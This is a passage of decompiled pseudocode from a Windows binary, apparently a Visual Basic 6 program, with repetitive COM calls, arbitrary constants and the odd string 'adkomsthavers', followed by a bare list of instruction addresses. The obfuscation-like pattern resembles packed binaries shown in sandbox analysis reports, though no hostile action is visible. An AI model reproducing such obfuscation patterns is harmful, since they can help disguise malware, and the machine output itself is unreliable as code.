					_push(_a4);
					_push(_v360);
					L0040145A();
					_v540 = _t1289;
				}
				_v92 = _v264;
				L0040140C();
				L00401406();
				L00401400();
				_t1769 = _t1767 + 0x30;
				_v8 = 0xa;
				_t1304 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v276, 3,  &_v176,  &_v192,  &_v208, 7,  &_v132,  &_v136,  &_v140,  &_v144,  &_v152,  &_v156,  &_v148);
				_v312 = _t1304;
				if(_v312 >= 0) {
					_v544 = _v544 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x403918);
					_push(_a4);
					_push(_v312);
					L0040145A();
					_v544 = _t1304;
				}
				_v64 = _v276;
				_v8 = 0xb;
				if( *0x413010 != 0) {
					_v548 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v548 = 0x413010;
				}
				_t1309 =  &_v132;
				L00401430();
				_v312 = _t1309;
				_t1313 =  *((intOrPtr*)( *_v312 + 0x188))(_v312,  &_v276, _t1309,  *((intOrPtr*)( *((intOrPtr*)( *_v548)) + 0x30c))( *_v548));
				asm("fclex");
				_v316 = _t1313;
				if(_v316 >= 0) {
					_v552 = _v552 & 0x00000000;
				} else {
					_push(0x188);
					_push(0x403ac4);
					_push(_v312);
					_push(_v316);
					L0040145A();
					_v552 = _t1313;
				}
				if( *0x413010 != 0) {
					_v556 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v556 = 0x413010;
				}
				_t1317 =  &_v136;
				L00401430();
				_v320 = _t1317;
				_t1321 =  *((intOrPtr*)( *_v320 + 0x140))(_v320,  &_v260, _t1317,  *((intOrPtr*)( *((intOrPtr*)( *_v556)) + 0x30c))( *_v556));
				asm("fclex");
				_v324 = _t1321;
				if(_v324 >= 0) {
					_v560 = _v560 & 0x00000000;
				} else {
					_push(0x140);
					_push(0x403ac4);
					_push(_v320);
					_push(_v324);
					L0040145A();
					_v560 = _t1321;
				}
				if( *0x413010 != 0) {
					_v564 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v564 = 0x413010;
				}
				_t1325 =  &_v140;
				L00401430();
				_v328 = _t1325;
				_t1329 =  *((intOrPtr*)( *_v328 + 0x50))(_v328,  &_v120, _t1325,  *((intOrPtr*)( *((intOrPtr*)( *_v564)) + 0x308))( *_v564));
				asm("fclex");
				_v332 = _t1329;
				if(_v332 >= 0) {
					_v568 = _v568 & 0x00000000;
				} else {
					_push(0x50);
					_push(0x403ac4);
					_push(_v328);
					_push(_v332);
					L0040145A();
					_v568 = _t1329;
				}
				_v396 = _v120;
				_v120 = _v120 & 0x00000000;
				_v168 = _v396;
				_v176 = 8;
				_v264 = _v260;
				L004012E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t1337 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, _v276,  &_v264, 0x10);
				_v336 = _t1337;
				if(_v336 >= 0) {
					_v572 = _v572 & 0x00000000;
				} else {
					_push(0x708);
					_push(0x403918);
					_push(_a4);
					_push(_v336);
					L0040145A();
					_v572 = _t1337;
				}
				_push( &_v140);
				_push( &_v136);
				_push( &_v132);
				_push(3);
				L00401406();
				_t1770 = _t1769 + 0x10;
				L0040143C();
				_v8 = 0xc;
				if( *0x413010 != 0) {
					_v576 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v576 = 0x413010;
				}
				_t1344 =  &_v132;
				L00401430();
				_v312 = _t1344;
				_t1348 =  *((intOrPtr*)( *_v312 + 0x188))(_v312,  &_v276, _t1344,  *((intOrPtr*)( *((intOrPtr*)( *_v576)) + 0x30c))( *_v576));
				asm("fclex");
				_v316 = _t1348;
				if(_v316 >= 0) {
					_v580 = _v580 & 0x00000000;
				} else {
					_push(0x188);
					_push(0x403ac4);
					_push(_v312);
					_push(_v316);
					L0040145A();
					_v580 = _t1348;
				}
				if( *0x413010 != 0) {
					_v584 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v584 = 0x413010;
				}
				_t1352 =  &_v136;
				L00401430();
				_v320 = _t1352;
				_t1356 =  *((intOrPtr*)( *_v320 + 0x48))(_v320,  &_v120, _t1352,  *((intOrPtr*)( *((intOrPtr*)( *_v584)) + 0x308))( *_v584));
				asm("fclex");
				_v324 = _t1356;
				if(_v324 >= 0) {
					_v588 = _v588 & 0x00000000;
				} else {
					_push(0x48);
					_push(0x403ac4);
					_push(_v320);
					_push(_v324);
					L0040145A();
					_v588 = _t1356;
				}
				if( *0x413010 != 0) {
					_v592 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v592 = 0x413010;
				}
				_t1360 =  &_v140;
				L00401430();
				_v328 = _t1360;
				_t1364 =  *((intOrPtr*)( *_v328 + 0x68))(_v328,  &_v280, _t1360,  *((intOrPtr*)( *((intOrPtr*)( *_v592)) + 0x308))( *_v592));
				asm("fclex");
				_v332 = _t1364;
				if(_v332 >= 0) {
					_v596 = _v596 & 0x00000000;
				} else {
					_push(0x68);
					_push(0x403ac4);
					_push(_v328);
					_push(_v332);
					L0040145A();
					_v596 = _t1364;
				}
				if( *0x413010 != 0) {
					_v600 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v600 = 0x413010;
				}
				_t1368 =  &_v144;
				L00401430();
				_v336 = _t1368;
				_t1372 =  *((intOrPtr*)( *_v336 + 0x130))(_v336,  &_v148, _t1368,  *((intOrPtr*)( *((intOrPtr*)( *_v600)) + 0x30c))( *_v600));
				asm("fclex");
				_v340 = _t1372;
				if(_v340 >= 0) {
					_v604 = _v604 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x403ac4);
					_push(_v336);
					_push(_v340);
					L0040145A();
					_v604 = _t1372;
				}
				if( *0x413010 != 0) {
					_v608 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v608 = 0x413010;
				}
				_t1671 =  *((intOrPtr*)( *_v608));
				_t1376 =  &_v152;
				L00401430();
				_v344 = _t1376;
				_t1380 =  *((intOrPtr*)( *_v344 + 0x108))(_v344,  &_v124, _t1376,  *((intOrPtr*)(_t1671 + 0x304))( *_v608));
				asm("fclex");
				_v348 = _t1380;
				if(_v348 >= 0) {
					_v612 = _v612 & 0x00000000;
				} else {
					_push(0x108);
					_push(0x403ac4);
					_push(_v344);
					_push(_v348);
					L0040145A();
					_v612 = _t1380;
				}
				_v400 = _v124;
				_v124 = _v124 & 0x00000000;
				_v184 = _v400;
				_v192 = 8;
				_v404 = _v148;
				_v148 = _v148 & 0x00000000;
				_v168 = _v404;
				_v176 = 9;
				_v288 = 0x24158f;
				_v284 = _v276;
				L004012E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v728 =  *0x4011d8;
				_t1393 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4,  &_v284, _v120, _t1671, _t1671, _v280,  &_v288, 0x10,  &_v192, 0xf0230230, 0x5afa,  &_v208);
				_v352 = _t1393;
				if(_v352 >= 0) {
					_v616 = _v616 & 0x00000000;
				} else {
					_push(0x70c);
					_push(0x403918);
					_push(_a4);
					_push(_v352);
					L0040145A();
					_v616 = _t1393;
				}
				L004013F4();
				L0040140C();
				L00401406();
				L00401400();
				_t1772 = _t1770 + 0x24;
				_v8 = 0xd;
				L004013EE();
				 *((intOrPtr*)( *_a4 + 0x72c))(_a4, 0x78e34920, 0x5b07, 0x7329fe,  &_v120,  &_v300, 2,  &_v176,  &_v192, 5,  &_v132,  &_v136,  &_v140,  &_v144,  &_v152);
				_v60 = _v300;
				L0040140C();
				_v8 = 0xe;
				if( *0x413010 != 0) {
					_v620 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v620 = 0x413010;
				}
				_t1409 =  &_v132;
				L00401430();
				_v312 = _t1409;
				_t1413 =  *((intOrPtr*)( *_v312 + 0xf8))(_v312,  &_v136, _t1409,  *((intOrPtr*)( *((intOrPtr*)( *_v620)) + 0x2fc))( *_v620));
				asm("fclex");
				_v316 = _t1413;
				if(_v316 >= 0) {
					_v624 = _v624 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x403ac4);
					_push(_v312);
					_push(_v316);
					L0040145A();
					_v624 = _t1413;
				}
				_push(0);
				_push(0);
				_push(_v136);
				_push( &_v176);
				L00401424();
				_t1773 = _t1772 + 0x10;
				if( *0x413010 != 0) {
					_v628 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v628 = 0x413010;
				}
				_t1418 =  &_v140;
				L00401430();
				_v320 = _t1418;
				_t1422 =  *((intOrPtr*)( *_v320 + 0x118))(_v320,  &_v276, _t1418,  *((intOrPtr*)( *((intOrPtr*)( *_v628)) + 0x2fc))( *_v628));
				asm("fclex");
				_v324 = _t1422;
				if(_v324 >= 0) {
					_v632 = _v632 & 0x00000000;
				} else {
					_push(0x118);
					_push(0x403ac4);
					_push(_v320);
					_push(_v324);
					L0040145A();
					_v632 = _t1422;
				}
				if( *0x413010 != 0) {
					_v636 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v636 = 0x413010;
				}
				_t1426 =  &_v144;
				L00401430();
				_v328 = _t1426;
				_t1430 =  *((intOrPtr*)( *_v328 + 0x140))(_v328,  &_v260, _t1426,  *((intOrPtr*)( *((intOrPtr*)( *_v636)) + 0x30c))( *_v636));
				asm("fclex");
				_v332 = _t1430;
				if(_v332 >= 0) {
					_v640 = _v640 & 0x00000000;
				} else {
					_push(0x140);
					_push(0x403ac4);
					_push(_v328);
					_push(_v332);
					L0040145A();
					_v640 = _t1430;
				}
				if( *0x413010 != 0) {
					_v644 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v644 = 0x413010;
				}
				_t1434 =  &_v148;
				L00401430();
				_v336 = _t1434;
				_t1438 =  *((intOrPtr*)( *_v336 + 0x68))(_v336,  &_v280, _t1434,  *((intOrPtr*)( *((intOrPtr*)( *_v644)) + 0x304))( *_v644));
				asm("fclex");
				_v340 = _t1438;
				if(_v340 >= 0) {
					_v648 = _v648 & 0x00000000;
				} else {
					_push(0x68);
					_push(0x403ac4);
					_push(_v336);
					_push(_v340);
					L0040145A();
					_v648 = _t1438;
				}
				if( *0x413010 != 0) {
					_v652 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v652 = 0x413010;
				}
				_t1442 =  &_v152;
				L00401430();
				_v344 = _t1442;
				_t1446 =  *((intOrPtr*)( *_v344 + 0xf8))(_v344,  &_v156, _t1442,  *((intOrPtr*)( *((intOrPtr*)( *_v652)) + 0x2fc))( *_v652));
				asm("fclex");
				_v348 = _t1446;
				if(_v348 >= 0) {
					_v656 = _v656 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x403ac4);
					_push(_v344);
					_push(_v348);
					L0040145A();
					_v656 = _t1446;
				}
				_push(0);
				_push(0);
				_push(_v156);
				_push( &_v192);
				L00401424();
				_t1774 = _t1773 + 0x10;
				if( *0x413010 != 0) {
					_v660 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v660 = 0x413010;
				}
				_t1451 =  &_v160;
				L00401430();
				_v352 = _t1451;
				_t1455 =  *((intOrPtr*)( *_v352 + 0xa0))(_v352,  &_v264, _t1451,  *((intOrPtr*)( *((intOrPtr*)( *_v660)) + 0x308))( *_v660));
				asm("fclex");
				_v356 = _t1455;
				if(_v356 >= 0) {
					_v664 = _v664 & 0x00000000;
				} else {
					_push(0xa0);
					_push(0x403ac4);
					_push(_v352);
					_push(_v356);
					L0040145A();
					_v664 = _t1455;
				}
				L004013EE();
				_v268 = _v260;
				_v288 = _v276;
				_t1458 =  &_v176;
				L004013FA();
				_v284 = _t1458;
				_t1460 =  &_v192;
				L004013FA();
				 *((intOrPtr*)( *_a4 + 0x730))(_a4, 0x361c8d,  &_v284, 0x90f51c30, 0x5af5,  &_v288,  &_v268,  &_v120, L"adkomsthavers", _v280, _t1460, _t1460, _v264,  &_v208, _t1458);
				L004013F4();
				L0040140C();
				_push( &_v156);
				_push( &_v136);
				_push( &_v160);
				_push( &_v152);
				_push( &_v148);
				_push( &_v144);
				_push( &_v140);
				_push( &_v132);
				_push(8);
				L00401406();
				_push( &_v192);
				_push( &_v176);
				_push(2);
				L00401400();
				_t1776 = _t1774 + 0x30;
				_v8 = 0xf;
				if( *0x413010 != 0) {
					_v668 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v668 = 0x413010;
				}
				_t1481 =  &_v132;
				L00401430();
				_v312 = _t1481;
				_t1485 =  *((intOrPtr*)( *_v312 + 0xa0))(_v312,  &_v260, _t1481,  *((intOrPtr*)( *((intOrPtr*)( *_v668)) + 0x2fc))( *_v668));
				asm("fclex");
				_v316 = _t1485;
				if(_v316 >= 0) {
					_v672 = _v672 & 0x00000000;
				} else {
					_push(0xa0);
					_push(0x403ac4);
					_push(_v312);
					_push(_v316);
					L0040145A();
					_v672 = _t1485;
				}
				if( *0x413010 != 0) {
					_v676 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v676 = 0x413010;
				}
				_t1489 =  &_v136;
				L00401430();
				_v320 = _t1489;
				_t1493 =  *((intOrPtr*)( *_v320 + 0xf8))(_v320,  &_v140, _t1489,  *((intOrPtr*)( *((intOrPtr*)( *_v676)) + 0x30c))( *_v676));
				asm("fclex");
				_v324 = _t1493;
				if(_v324 >= 0) {
					_v680 = _v680 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x403ac4);
					_push(_v320);
					_push(_v324);
					L0040145A();
					_v680 = _t1493;
				}
				if( *0x413010 != 0) {
					_v684 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v684 = 0x413010;
				}
				_t1497 =  &_v144;
				L00401430();
				_v328 = _t1497;
				_t1501 =  *((intOrPtr*)( *_v328 + 0x78))(_v328,  &_v276, _t1497,  *((intOrPtr*)( *((intOrPtr*)( *_v684)) + 0x308))( *_v684));
				asm("fclex");
				_v332 = _t1501;
				if(_v332 >= 0) {
					_v688 = _v688 & 0x00000000;
				} else {
					_push(0x78);
					_push(0x403ac4);
					_push(_v328);
					_push(_v332);
					L0040145A();
					_v688 = _t1501;
				}
				_v300 =  *0x4011d0;
				_v248 = 0x358644;
				_v256 = 3;
				_v280 = _v276;
				_v408 = _v140;
				_v140 = _v140 & 0x00000000;
				_v168 = _v408;
				_v176 = 9;
				_v264 = _v260;
				_v232 = 0x68c4b;
				_v240 = 3;
				_v216 = 0x3e5b6f;
				_v224 = 3;
				L004012E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004012E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004012E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t1515 =  *((intOrPtr*)( *_a4 + 0x710))(_a4, 0x10, 0x10,  &_v264,  &_v176, 0x7c207e50, 0x5afd,  &_v280, 0x10,  &_v300,  &_v308);
				_v336 = _t1515;
				if(_v336 >= 0) {
					_v692 = _v692 & 0x00000000;
				} else {
					_push(0x710);
					_push(0x403918);
					_push(_a4);
					_push(_v336);
					L0040145A();
					_v692 = _t1515;
				}
				_v52 = _v308;
				_v48 = _v304;
				_push( &_v144);
				_push( &_v136);
				_push( &_v132);
				_push(3);
				L00401406();
				_t1777 = _t1776 + 0x10;
				L0040143C();
				_v8 = 0x10;
				if( *0x413010 != 0) {
					_v696 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v696 = 0x413010;
				}
				_t1524 =  &_v132;
				L00401430();
				_v312 = _t1524;
				_t1528 =  *((intOrPtr*)( *_v312 + 0x178))(_v312,  &_v260, _t1524,  *((intOrPtr*)( *((intOrPtr*)( *_v696)) + 0x308))( *_v696));
				asm("fclex");
				_v316 = _t1528;
				if(_v316 >= 0) {
					_v700 = _v700 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x403ac4);
					_push(_v312);
					_push(_v316);
					L0040145A();
					_v700 = _t1528;
				}
				if( *0x413010 != 0) {
					_v704 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v704 = 0x413010;
				}
				_t1712 =  *((intOrPtr*)( *_v704));
				_t1532 =  &_v136;
				L00401430();
				_v320 = _t1532;
				_t1536 =  *((intOrPtr*)( *_v320 + 0x118))(_v320,  &_v276, _t1532,  *((intOrPtr*)(_t1712 + 0x30c))( *_v704));
				asm("fclex");
				_v324 = _t1536;
				if(_v324 >= 0) {
					_v708 = _v708 & 0x00000000;
				} else {
					_push(0x118);
					_push(0x403ac4);
					_push(_v320);
					_push(_v324);
					L0040145A();
					_v708 = _t1536;
				}
				_v268 = 0x5633;
				_v264 = 0x44d0;
				_v168 = 0x48a00a;
				_v176 = 3;
				 *_t1777 =  *0x4011c8;
				_t1543 =  *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v176, _t1712, _t1712,  &_v264, _v260,  &_v268, _v276,  &_v272);
				_v328 = _t1543;
				if(_v328 >= 0) {
					_v712 = _v712 & 0x00000000;
				} else {
					_push(0x714);
					_push(0x403918);
					_push(_a4);
					_push(_v328);
					L0040145A();
					_v712 = _t1543;
				}
				_v44 = _v272;
				_push( &_v136);
				_push( &_v132);
				_push(2);
				L00401406();
				_t1778 = _t1777 + 0xc;
				L0040143C();
				_v8 = 0x11;
				if( *0x413010 != 0) {
					_v716 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v716 = 0x413010;
				}
				_t1550 =  &_v132;
				L00401430();
				_v312 = _t1550;
				_t1554 =  *((intOrPtr*)( *_v312 + 0x78))(_v312,  &_v276, _t1550,  *((intOrPtr*)( *((intOrPtr*)( *_v716)) + 0x300))( *_v716));
				asm("fclex");
				_v316 = _t1554;
				if(_v316 >= 0) {
					_v720 = _v720 & 0x00000000;
				} else {
					_push(0x78);
					_push(0x403ac4);
					_push(_v312);
					_push(_v316);
					L0040145A();
					_v720 = _t1554;
				}
				if( *0x413010 != 0) {
					_v724 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x402b8c);
					L0040142A();
					_v724 = 0x413010;
				}
				_t1558 =  &_v136;
				L00401430();
				_v320 = _t1558;
				_t1562 =  *((intOrPtr*)( *_v320 + 0x60))(_v320,  &_v280, _t1558,  *((intOrPtr*)( *((intOrPtr*)( *_v724)) + 0x30c))( *_v724));
				asm("fclex");
				_v324 = _t1562;
				if(_v324 >= 0) {
					_v728 = _v728 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x403ac4);
					_push(_v320);
					_push(_v324);
					L0040145A();
					_v728 = _t1562;
				}
				_v292 = _v280;
				_v288 = 0x855264;
				_v284 = _v276;
				_t1720 =  &_v120;
				L004013EE();
				 *_t1778 =  *0x4011c0;
				_t1570 =  *((intOrPtr*)( *_a4 + 0x718))(_a4, _t1720, _t1720,  &_v120,  &_v284,  &_v288, 0x9ec81,  &_v292);
				_v328 = _t1570;
				if(_v328 >= 0) {
					_v732 = _v732 & 0x00000000;
				} else {
					_push(0x718);
					_push(0x403918);
					_push(_a4);
					_push(_v328);
					L0040145A();
					_v732 = _t1570;
				}
				L0040140C();
				L00401406();
				_v8 = 0x12;
				L004013E8();
				_v8 = 0x13;
				_t1575 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 0xffffffff, 2,  &_v132,  &_v136);
				asm("fclex");
				_v312 = _t1575;
				if(_v312 >= 0) {
					_v736 = _v736 & 0x00000000;
				} else {
					_push(0x2b4);
					_push(0x4038e8);
					_push(_a4);
					_push(_v312);
					L0040145A();
					_v736 = _t1575;
				}
				while(1) {
					_v8 = 0x15;
					_v40 = _v40 + 1;
					_v8 = 0x16;
					if(_v40 > 1) {
						break;
					}
				}
				_v8 = 0x1a;
				E00411BBE();
				_v8 = 0x1b;
				_v40 = 2;
				_v8 = 0x1c;
				_v96 = 0x808344;
				_v8 = 0x1d;
				asm("cdq");
				_t1583 =  *((intOrPtr*)( *_a4 + 0x71c))(_a4, _v96 / _v40);
				_v20 = 0;
				asm("wait");
				_push(0x410e74);
				L0040143C();
				L0040143C();
				return _t1583;
			}












































































































































































































































































                                      0x0040e7ad
                                      0x0040e7bc
                                      0x0040e7c8
                                      0x0040e7d0
                                      0x0040e7d3
                                      0x0040e7e0
                                      0x0040e7e9
                                      0x0040e7ec
                                      0x0040e7fb
                                      0x0040e7fe
                                      0x0040e805
                                      0x0040e812
                                      0x0040e813
                                      0x0040e818
                                      0x0040e822
                                      0x0040e832
                                      0x0040e833
                                      0x0040e839
                                      0x0040e83a
                                      0x0040e83f
                                      0x0040e846
                                      0x0040e84c
                                      0x0040e85a
                                      0x0040e860
                                      0x0040e86e
                                      0x0040e88b
                                      0x0040e870
                                      0x0040e870
                                      0x0040e875
                                      0x0040e87a
                                      0x0040e87f
                                      0x0040e87f
                                      0x0040e8af
                                      0x0040e8b3
                                      0x0040e8b8
                                      0x0040e8d0
                                      0x0040e8d6
                                      0x0040e8d8
                                      0x0040e8e5
                                      0x0040e90a
                                      0x0040e8e7
                                      0x0040e8e7
                                      0x0040e8ec
                                      0x0040e8f1
                                      0x0040e8f7
                                      0x0040e8fd
                                      0x0040e902
                                      0x0040e902
                                      0x0040e914
                                      0x0040e91a
                                      0x0040e924
                                      0x0040e92a
                                      0x0040e93a
                                      0x0040e93b
                                      0x0040e943
                                      0x0040e948
                                      0x0040e94e
                                      0x0040e94e
                                      0x0040e953
                                      0x0040e95a
                                      0x0040e964
                                      0x0040e96e
                                      0x0040e978
                                      0x0040e982
                                      0x0040e993
                                      0x0040e999
                                      0x0040e9a6
                                      0x0040e9a7
                                      0x0040e9a8
                                      0x0040e9a9
                                      0x0040e9c5
                                      0x0040e9cb
                                      0x0040e9d8
                                      0x0040e9fa
                                      0x0040e9da
                                      0x0040e9da
                                      0x0040e9df
                                      0x0040e9e4
                                      0x0040e9e7
                                      0x0040e9ed
                                      0x0040e9f2
                                      0x0040e9f2
                                      0x0040ea07
                                      0x0040ea0c
                                      0x0040ea22
                                      0x0040ea2e
                                      0x0040ea31
                                      0x0040ea3f
                                      0x0040ea5c
                                      0x0040ea41
                                      0x0040ea41
                                      0x0040ea46
                                      0x0040ea4b
                                      0x0040ea50
                                      0x0040ea50
                                      0x0040ea80
                                      0x0040ea84
                                      0x0040ea89
                                      0x0040eaa4
                                      0x0040eaa7
                                      0x0040eaa9
                                      0x0040eab6
                                      0x0040ead8
                                      0x0040eab8
                                      0x0040eab8
                                      0x0040eaba
                                      0x0040eabf
                                      0x0040eac5
                                      0x0040eacb
                                      0x0040ead0
                                      0x0040ead0
                                      0x0040eae6
                                      0x0040eb03
                                      0x0040eae8
                                      0x0040eae8
                                      0x0040eaed
                                      0x0040eaf2
                                      0x0040eaf7
                                      0x0040eaf7
                                      0x0040eb27
                                      0x0040eb2e
                                      0x0040eb33
                                      0x0040eb4e
                                      0x0040eb54
                                      0x0040eb56
                                      0x0040eb63
                                      0x0040eb88
                                      0x0040eb65
                                      0x0040eb65
                                      0x0040eb6a
                                      0x0040eb6f
                                      0x0040eb75
                                      0x0040eb7b
                                      0x0040eb80
                                      0x0040eb80
                                      0x0040eb8f
                                      0x0040eb91
                                      0x0040eb93
                                      0x0040eb9f
                                      0x0040eba0
                                      0x0040eba5
                                      0x0040ebaf
                                      0x0040ebcc
                                      0x0040ebb1
                                      0x0040ebb1
                                      0x0040ebb6
                                      0x0040ebbb
                                      0x0040ebc0
                                      0x0040ebc0
                                      0x0040ebf0
                                      0x0040ebf7
                                      0x0040ebfc
                                      0x0040ec17
                                      0x0040ec1d
                                      0x0040ec1f
                                      0x0040ec2c
                                      0x0040ec51
                                      0x0040ec2e
                                      0x0040ec2e
                                      0x0040ec33
                                      0x0040ec38
                                      0x0040ec3e
                                      0x0040ec44
                                      0x0040ec49
                                      0x0040ec49
                                      0x0040ec5e
                                      0x0040ec64
                                      0x0040ec75
                                      0x0040ec7f
                                      0x0040ec8a
                                      0x0040ec90
                                      0x0040ec9a
                                      0x0040ecaa
                                      0x0040ecb0
                                      0x0040ecc1
                                      0x0040ecd9
                                      0x0040eceb
                                      0x0040ed07
                                      0x0040ed10
                                      0x0040ed1b
                                      0x0040ed22
                                      0x0040ed29
                                      0x0040ed2d
                                      0x0040ed2e
                                      0x0040ed30
                                      0x0040ed3e
                                      0x0040ed45
                                      0x0040ed46
                                      0x0040ed48
                                      0x0040ed4d
                                      0x0040ed50
                                      0x0040ed5e
                                      0x0040ed7b
                                      0x0040ed60
                                      0x0040ed60
                                      0x0040ed65
                                      0x0040ed6a
                                      0x0040ed6f
                                      0x0040ed6f
                                      0x0040ed9f
                                      0x0040eda3
                                      0x0040eda8
                                      0x0040edc3
                                      0x0040edc9
                                      0x0040edcb
                                      0x0040edd8
                                      0x0040edfd
                                      0x0040edda
                                      0x0040edda
                                      0x0040eddf
                                      0x0040ede4
                                      0x0040edea
                                      0x0040edf0
                                      0x0040edf5
                                      0x0040edf5
                                      0x0040ee04
                                      0x0040ee06
                                      0x0040ee08
                                      0x0040ee14
                                      0x0040ee15
                                      0x0040ee1a
                                      0x0040ee24
                                      0x0040ee41
                                      0x0040ee26
                                      0x0040ee26
                                      0x0040ee2b
                                      0x0040ee30
                                      0x0040ee35
                                      0x0040ee35
                                      0x0040ee65
                                      0x0040ee6c
                                      0x0040ee71
                                      0x0040ee89
                                      0x0040ee8f
                                      0x0040ee91
                                      0x0040ee9e
                                      0x0040eec3
                                      0x0040eea0
                                      0x0040eea0
                                      0x0040eea5
                                      0x0040eeaa
                                      0x0040eeb0
                                      0x0040eeb6
                                      0x0040eebb
                                      0x0040eebb
                                      0x0040eed1
                                      0x0040eeee
                                      0x0040eed3
                                      0x0040eed3
                                      0x0040eed8
                                      0x0040eedd
                                      0x0040eee2
                                      0x0040eee2
                                      0x0040ef12
                                      0x0040ef19
                                      0x0040ef1e
                                      0x0040ef39
                                      0x0040ef3f
                                      0x0040ef41
                                      0x0040ef4e
                                      0x0040ef73
                                      0x0040ef50
                                      0x0040ef50
                                      0x0040ef55
                                      0x0040ef5a
                                      0x0040ef60
                                      0x0040ef66
                                      0x0040ef6b
                                      0x0040ef6b
                                      0x0040ef7a
                                      0x0040ef7c
                                      0x0040ef7e
                                      0x0040ef8a
                                      0x0040ef8b
                                      0x0040ef90
                                      0x0040ef9a
                                      0x0040efb7
                                      0x0040ef9c
                                      0x0040ef9c
                                      0x0040efa1
                                      0x0040efa6
                                      0x0040efab
                                      0x0040efab
                                      0x0040efdb
                                      0x0040efe2
                                      0x0040efe7
                                      0x0040efff
                                      0x0040f005
                                      0x0040f007
                                      0x0040f014
                                      0x0040f039
                                      0x0040f016
                                      0x0040f016
                                      0x0040f01b
                                      0x0040f020
                                      0x0040f026
                                      0x0040f02c
                                      0x0040f031
                                      0x0040f031
                                      0x0040f047
                                      0x0040f064
                                      0x0040f049
                                      0x0040f049
                                      0x0040f04e
                                      0x0040f053
                                      0x0040f058
                                      0x0040f058
                                      0x0040f088
                                      0x0040f08f
                                      0x0040f094
                                      0x0040f0af
                                      0x0040f0b5
                                      0x0040f0b7
                                      0x0040f0c4
                                      0x0040f0e9
                                      0x0040f0c6
                                      0x0040f0c6
                                      0x0040f0cb
                                      0x0040f0d0
                                      0x0040f0d6
                                      0x0040f0dc
                                      0x0040f0e1
                                      0x0040f0e1
                                      0x0040f0f6
                                      0x0040f0fc
                                      0x0040f109
                                      0x0040f10f
                                      0x0040f11c
                                      0x0040f121
                                      0x0040f128
                                      0x0040f12d
                                      0x0040f136
                                      0x0040f13c
                                      0x0040f146
                                      0x0040f14c
                                      0x0040f156
                                      0x0040f15d
                                      0x0040f162
                                      0x0040f168
                                      0x0040f172
                                      0x0040f1a6
                                      0x0040f1b3
                                      0x0040f1b4
                                      0x0040f1b5
                                      0x0040f1b6
                                      0x0040f1ce
                                      0x0040f1d4
                                      0x0040f1e1
                                      0x0040f203
                                      0x0040f1e3
                                      0x0040f1e3
                                      0x0040f1e8
                                      0x0040f1ed
                                      0x0040f1f0
                                      0x0040f1f6
                                      0x0040f1fb
                                      0x0040f1fb
                                      0x0040f20d
                                      0x0040f218
                                      0x0040f21f
                                      0x0040f226
                                      0x0040f22d
                                      0x0040f234
                                      0x0040f23b
                                      0x0040f23f
                                      0x0040f240
                                      0x0040f242
                                      0x0040f250
                                      0x0040f257
                                      0x0040f25e
                                      0x0040f25f
                                      0x0040f261
                                      0x0040f266
                                      0x0040f269
                                      0x0040f277
                                      0x0040f294
                                      0x0040f279
                                      0x0040f279
                                      0x0040f27e
                                      0x0040f283
                                      0x0040f288
                                      0x0040f288
                                      0x0040f2b8
                                      0x0040f2bc
                                      0x0040f2c1
                                      0x0040f2dc
                                      0x0040f2df
                                      0x0040f2e1
                                      0x0040f2ee
                                      0x0040f310
                                      0x0040f2f0
                                      0x0040f2f0
                                      0x0040f2f2
                                      0x0040f2f7
                                      0x0040f2fd
                                      0x0040f303
                                      0x0040f308
                                      0x0040f308
                                      0x0040f31e
                                      0x0040f33b
                                      0x0040f320
                                      0x0040f320
                                      0x0040f325
                                      0x0040f32a
                                      0x0040f32f
                                      0x0040f32f
                                      0x0040f35f
                                      0x0040f366
                                      0x0040f36b
                                      0x0040f386
                                      0x0040f389
                                      0x0040f38b
                                      0x0040f398
                                      0x0040f3ba
                                      0x0040f39a
                                      0x0040f39a
                                      0x0040f39c
                                      0x0040f3a1
                                      0x0040f3a7
